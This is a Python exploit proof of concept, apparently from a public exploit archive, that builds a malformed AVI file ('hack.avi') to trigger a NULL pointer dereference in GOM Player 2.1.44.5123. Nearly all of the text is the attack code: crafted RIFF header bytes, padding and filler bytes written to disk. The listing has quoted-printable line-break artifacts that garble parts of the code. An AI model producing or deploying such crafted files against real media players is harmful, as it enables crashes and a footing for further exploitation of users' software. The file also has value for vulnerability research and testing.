61 lines
No EOL
1.8 KiB
Python
Executable file
61 lines
No EOL
1.8 KiB
Python
Executable file
# Exploit Title: gom player 2.1.44.5123 (Unicode) NULL pointer dereference =
|
|
vulnerability
|
|
# Date: 2012.10.09
|
|
# Exploit Author: wh1ant
|
|
# Software Link: http://app.gomtv.com/gom/GOMPLAYERSETUP.EXE
|
|
# Version: 2.1.44.5123 (Unicode)
|
|
# Tested on: windows 7 Ultimate k
|
|
# Language : python
|
|
|
|
f = open("hack.avi", "wb")
|
|
data = "\x52\x49\x46\x46\xca\x67\x41\x03\x41\x56\x49\x20\x4c\x49\x53\x54=
|
|
" \
|
|
"\xc0\x00\x00\x00\x68\x64\x72\x6c\x61\x76\x69\x68\x38\x00\x00\x00" =
|
|
\
|
|
"\x6b\x04\x01\x00\x9c\x5e\x07\x00\x00\x00\x00\x00\x10\x08\x00\x00" =
|
|
\
|
|
"\x1e\x0a\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xe1\x52\x01\x00" =
|
|
\
|
|
"\x40\x01\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
|
|
\
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x4c\x49\x53\x54\x74\x00\x00\x00" =
|
|
\
|
|
"\x73\x74\x72\x6c\x73\x74\x72\x68\x38\x00\x00\x00\x76\x69\x64\x73" =
|
|
\
|
|
"\x74\x73\x63\x63\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
|
|
\
|
|
"\x01\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x1e\x0a\x00\x00" =
|
|
\
|
|
"\xe1\x52\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
|
|
\
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
|
|
\
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
|
|
\
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
|
|
\
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
=20
|
|
f.write(data)
|
|
|
|
for i in range(0, 0x71a):
|
|
f.write("\x00")
|
|
|
|
data = "\x4c\x49\x53\x54\xee\xbd\x40\x03\x6d\x6f\x76\x69\x30\x30\x64\x62\=
|
|
x3d\x4c\x00"
|
|
f.write(data)
|
|
|
|
#for i in range(0, 0x41):
|
|
for i in range(0, 0x41):
|
|
f.write("\x41")
|
|
=20
|
|
for i in range(0, 0x41):
|
|
f.write("\x00")
|
|
=20
|
|
#for i in range(0, 0x41):
|
|
for i in range(0, 0x41):
|
|
f.write("\x41")
|
|
=20
|
|
f.write("\x69\x64\x78\x31\xe0\xa1")
|
|
|
|
f.close() |